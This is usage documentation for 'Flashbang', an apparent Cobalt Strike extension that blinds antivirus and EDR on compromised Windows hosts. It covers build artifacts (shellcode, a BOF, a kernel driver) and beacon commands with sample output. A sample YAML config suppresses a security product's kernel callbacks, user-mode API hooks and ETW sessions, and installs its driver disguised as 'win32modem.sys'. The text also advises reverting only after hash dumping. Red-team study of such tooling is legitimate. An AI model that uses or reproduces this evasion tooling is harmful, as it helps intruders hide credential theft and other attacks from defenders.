# Cobalt Strike Usage

<style type="text/css">
.markdown-section pre.cobalt-strike {
  background-color: black !important;
  padding: 0 1rem;
}

.markdown-section pre.cobalt-strike > code {
  background-color: black !important;
  color: rgb(204, 204, 204);
  font-size: .9rem;
  padding: 0.5em 0px;
}

.markdown-section pre.cobalt-strike > code > span.blue {
  color: rgb(81, 159, 207);
}

.markdown-section pre.cobalt-strike > code > span.green {
  color: rgb(138, 226, 52);
}

.markdown-section pre.cobalt-strike > code > span.white {
  color: white;
}

.markdown-section pre.cobalt-strike > code > span.yellow {
  color: yellow;
}
</style>

## Building

Read the [Building Flashbang](developers/building) page first to build the files necessary for Cobalt Strike integration. The process should produce a `dist/CobaltStrike` directory containing 6 files which you can copy to wherever you store scripts for CS:

0. **flashbang.cna**: Aggressor script operators can use to interface with Flashbang.
0. **flashbang_core.bin**: DLL for Flashbang, converted to shellcode using [Donut](https://github.com/TheWover/donut).
0. **flashbang_bof.o**: BOF that serves as a bridge between the Aggressor script and the core module.
0. **flashbang_driver.sys**: Driver component used for Km*-prefixed [actions](developers/reference?id=payload-actions).
0. **flashbang_schema.json**: [JSON Schema](https://json-schema.org/) used to validate Blindlet files.
0. **flashbang_serializer.jar**: Java module imported by Aggressor script used for message (de)serialization.

!> **OPSEC Remark**: To reduce the weight and the amount of string artifacts in the Flashbang module, the YAML blindlet files are not directly parsed on the target system. Instead, binary-formatted payloads serialized with [FlatBuffers](developers/internals?id=message-serialization) are sent to the module. The responses from the module are deserialized locally to avoid unnecessary processing on the beacon.

## Usage

1. Copy the files above to your Cobalt Strike scripts directory.
2. Load `flashbang.cna` using the Script Manager.
3. Validate load by typing `flashbang help` into a beacon console, or right-clicking a session to see "Flashbang" in the context menu.

<pre class="cobalt-strike">
<code>
beacon> <span class="yellow">flashbang help</span>
[+] Flashbang commands: load, enable &lt;path/to/blindlet.yaml&gt;, disable, unload.
</code>
</pre>

### Loading Flashbang into a Beacon

The `flashbang load` command is used to load the module into the beacon. Once this is done, the beacon will be ready to accept blindlet files. As noted above, the beacon returns raw responses which are parsed locally.

<pre class="cobalt-strike">
<code>
beacon> <span class="yellow">flashbang load</span>
[*] [FB] Loading capability...
[+] host called home, sent: 314324 bytes
[+] received output:
[>] [FB] BOF loaded (compiled on Sat Jan 30 11:03:14 2021).
[+] received output:
[>] [FB] Received module (281115 bytes).
[+] received output:
[>] [FB] Loaded module (tasked by operator #108952).
<span class="blue">[*]</span> [FB] Flashbang Loaded
[+] received output:
[>] [FB] Raw response (tasked by operator #108952):
FAAAAAAAAAAAAAoAFAATAAAABAAKAAAAczBjEkAL1wEAAAAAAAAAAQ==
[+] [FB] Parsed response:
<span class="green">[>] [FB] - LOAD_CAPABILITY (STATUS_SUCCESS, 2021-02-05T04:16:45)</span>
</code>
</pre>

### Enabling a Blindlet

The `flashbang enable <path/to/blindlet.yaml>` command is used to load and apply a blindlet on the beacon. If blindlet files are placed in the same directory as the aggressor script, you can use a relative path instead. The example blindlet below suppresses kernel-mode callbacks, user-mode hooks, and a provider within an ETW session. Check out the [Blindlet Tutorials](developers/tutorial) page for more guidance.

```yaml
---
meta:
  product: Tsava Free Antivirus
  authors:
    - Anonymous
  
  schema_version: 1

  compatibility:
    tested_product_versions:
      - 21.1.1337
    tested_os_versions:
      - Windows 10, version 1909

  opsec:
    technique_detection_resiliency: TBD
    transmission_volume: TBD
    remarks: TBD

payload:
  driver_settings:
    loading_method: FILE
    service_name: Modem
    destination_path: '%SystemRoot%\win32modem.sys'
    registry_image_path: '\SystemRoot\System32\drivers\win32modem.sys'
    use_random_hash: true
    use_leading_dot: false

  actions:        
    - type: KmSuppressCallbacks
      note: Suppress callbacks on tswVmm.sys.
      conf:
        module_name: tswVmm.sys
        types: [IMAGE]
        
    - type: KmSuppressCallbacks
      note: Suppress callbacks on tswbidsdriver.sys.
      conf:
        module_name: tswbidsdriver.sys
        types: [IMAGE, THREAD, REGISTRY, OBJECT]
        
    - type: KmSuppressCallbacks
      note: Suppress callbacks on tswbuniv.sys.
      conf:
        module_name: tswbuniv.sys
        types: [IMAGE, PROCESS]

    - type: UmSuppressHooks
      note: Suppress hooks on user-mode APIs (this process only).
      conf:
        functions: []

    - type: UmSuppressEtw
      note: Suppress Tsava-IDP session.
      conf:
        session: Tsava-IDP
        providers:
          - Microsoft-Windows-WMI-Activity
```

<pre class="cobalt-strike">
<code>
beacon> <span class="yellow">flashbang enable tsava.yaml</span>
[*] [FB] Enabling blindlet (C:\CobaltStrike\Scripts\Flashbang\tsava.yaml)...
[+] host called home, sent: 4409 bytes
[+] received output:
[>] [FB] Raw response (tasked by operator #108952):
FAAAAAAAAAAAAAoAFAATAAAABAAKAAAABUEkz+L1wEAAAAAAAAAAg==
[+] [FB] Parsed response:
<span class="green">[>] [FB] - LOAD_BLINDLET (STATUS_SUCCESS, 2021-02-05T05:28:47)</span>
[+] received output:
[>] [FB] Raw response (tasked by operator #108952):
HAAAAAAAAAAAABIANBYTAAAABAAAAAAAAAAUABIAAAAfDbwlegvXAQAAAAAAAAAE
ILprjP1/AAAgAAAQzpc ...... [snip] ...... lxBRFZBUEkzMi5kbGwAAAAA
wszMSIuEJOAAAABJdv7//xgAAAA8AAAATAAAAFwAAACQuWuM/X8AACAAAABDOlxX
[+] [FB] Parsed response:
<span class="green">[>] [FB] - APPLY_BLINDLET (STATUS_SUCCESS, 2021-02-05T05:28:47)</span>
[>] [FB]   - Action Responses:
<span class="white">[>] [FB]     - KmSuppressCallbacks (STATUS_SUCCESS)</span>
[>] [FB]       - tswVmm.sys+0x24278 (IMAGE)
<span class="white">[>] [FB]     - KmSuppressCallbacks (STATUS_SUCCESS)</span>
[>] [FB]       - tswbidsdriver.sys+0x1de80 (THREAD)
[>] [FB]       - tswbidsdriver.sys+0x215c0 (REGISTRY)
[>] [FB]       - tswbidsdriver.sys+0x1e1d0 (OBJECT)
[>] [FB]       - tswbidsdriver.sys+0x1e450 (OBJECT)
<span class="white">[>] [FB]     - KmSuppressCallbacks (STATUS_SUCCESS)</span>
[>] [FB]       - tswbuniv.sys+0x1900 (IMAGE)
[>] [FB]       - tswbuniv.sys+0x1750 (PROCESS)
<span class="white">[>] [FB]     - UmSuppressHooks (STATUS_SUCCESS)</span>
[>] [FB]       - ntdll.dll!LdrLoadDll @ 0x7ffd8ef01790
[>] [FB]       - ntdll.dll!RtlDecompressBuffer @ 0x7ffd8efb4b20
[>] [FB]       - ntdll.dll!RtlQueryEnvironmentVariable @ 0x7ffd8eed8720
[>] [FB]       - ADVAPI32.dll!CreateServiceA @ 0x7ffd8c6bb990
[>] [FB]       - ADVAPI32.dll!CreateServiceW @ 0x7ffd8c6bba20
[>] [FB]       - ADVAPI32.dll!CryptDuplicateKey @ 0x7ffd8c6bbd90
[>] [FB]       - ADVAPI32.dll!CryptGenKey @ 0x7ffd8c6bbdf0
[>] [FB]       - ADVAPI32.dll!CryptImportKey @ 0x7ffd8c6a4f50
[>] [FB]       - ADVAPI32.dll!LogonUserA @ 0x7ffd8c6d3320
[>] [FB]       - ADVAPI32.dll!LogonUserExA @ 0x7ffd8c6d34c0
[>] [FB]       - ADVAPI32.dll!LogonUserExW @ 0x7ffd8c6d3520
[>] [FB]       - ADVAPI32.dll!LogonUserW @ 0x7ffd8c6aa800
<span class="white">[>] [FB]     - UmSuppressEtw (STATUS_SUCCESS)</span>
[>] [FB]       - Tsava-IDP: Microsoft-Windows-WMI-Activity
<span class="blue">[*]</span> [FB] Blindlet Enabled
</code>
</pre>

### Disabling a Blindlet

After you have dumped hashes or performed other noisy behaviour, you can revert and unload the blindlet using the `flashbang disable` command. At this point, you can choose to load the same or another blindlet, or unload Flashbang from the beacon.

<pre class="cobalt-strike">
<code>
beacon> <span class="yellow">flashbang disable</span>
[+] host called home, sent: 3733 bytes
[+] received output:
[>] [FB] Raw response (tasked by operator #108952):
HAAAAAAAAAAAABIA9AATAAAABAAAAAAAAAAUABIAAABX6an4ewvXAQAAAAAAAAAF
V+mp+HsL1wEAAAAA0v// ...... [snip] ...... /9X6an4ewvXAQAAADK////
AAAKAA4AAAAAAAQACgAAAFfpqfh7C9cBAAAKAA4ADQAAAAQACgAAAFfpqfh7C9cB
[+] [FB] Parsed response:
<span class="green">[>] [FB] - REVERT_BLINDLET (STATUS_SUCCESS, 2021-02-05T05:41:51)</span>
[>] [FB]   - Action Responses:
<span class="white">[>] [FB]     - UmSuppressEtw (STATUS_SUCCESS)</span>
<span class="white">[>] [FB]     - UmSuppressHooks (STATUS_SUCCESS)</span>
<span class="white">[>] [FB]     - KmSuppressCallbacks (STATUS_SUCCESS)</span>
<span class="white">[>] [FB]     - KmSuppressCallbacks (STATUS_SUCCESS)</span>
<span class="white">[>] [FB]     - KmSuppressCallbacks (STATUS_SUCCESS)</span>
[+] received output:
[>] [FB] Raw response (tasked by operator #108952):
FAAAAAAAAAAAAAoAFAATAAAABAAKAAAAY2u+6an4ewEAAAAAAAAAAw==
[+] [FB] Parsed response:
<span class="green">[>] [FB] - UNLOAD_BLINDLET (STATUS_SUCCESS, 2021-02-05T05:41:51)</span>
<span class="blue">[*]</span> [FB] Blindlet Disabled
</code>
</pre>

### Unloading Flashbang

When you are ready to unload Flashbang from the beacon, use the `flashbang unload` command. This will free buffers and terminate any threads specific to Flashbang.

<pre class="cobalt-strike">
<code>
beacon> <span class="yellow">flashbang unload</span>
[+] host called home, sent: 3705 bytes
[+] received output:
[>] [FB] Raw response (tasked by operator #108952):
FAAAAAAAAAAAAAoAFAATAAAABAAKAAAAEG+k6fXzL1wEAAAAAAAABg==
[+] [FB] Parsed response:
<span class="green">[>] [FB] - UNLOAD_CAPABILITY (STATUS_SUCCESS, 2021-02-05T05:45:33)</span>
<span class="blue">[*]</span> [FB] Flashbang Unloaded
</code>
</pre>

## Troubleshooting

### Blindlet Errors

Blindlet YAML files are validated before they are serialized into a format that the beacon can accept. You will be notified if there are errors in your blindlet, and you can check the Script Console to get details as shown in the example below:

<pre class="cobalt-strike">
<code>
[FB] Validation errors on C:\CobaltStrike\Scripts\Flashbang\tsava.yaml:
[FB] - $.payload.driver_settings.loading_method: does not have a value in the enumeration [FILE, SMB, WEBDAV]
[FB] - $.payload.actions[0].conf.types[2]: does not have a value in the enumeration [IMAGE, PROCESS, THREAD, REGISTRY, OBJECT, FILE]
[FB] - $.payload.actions[8].conf.providers: is missing but it is required
</code>
</pre>
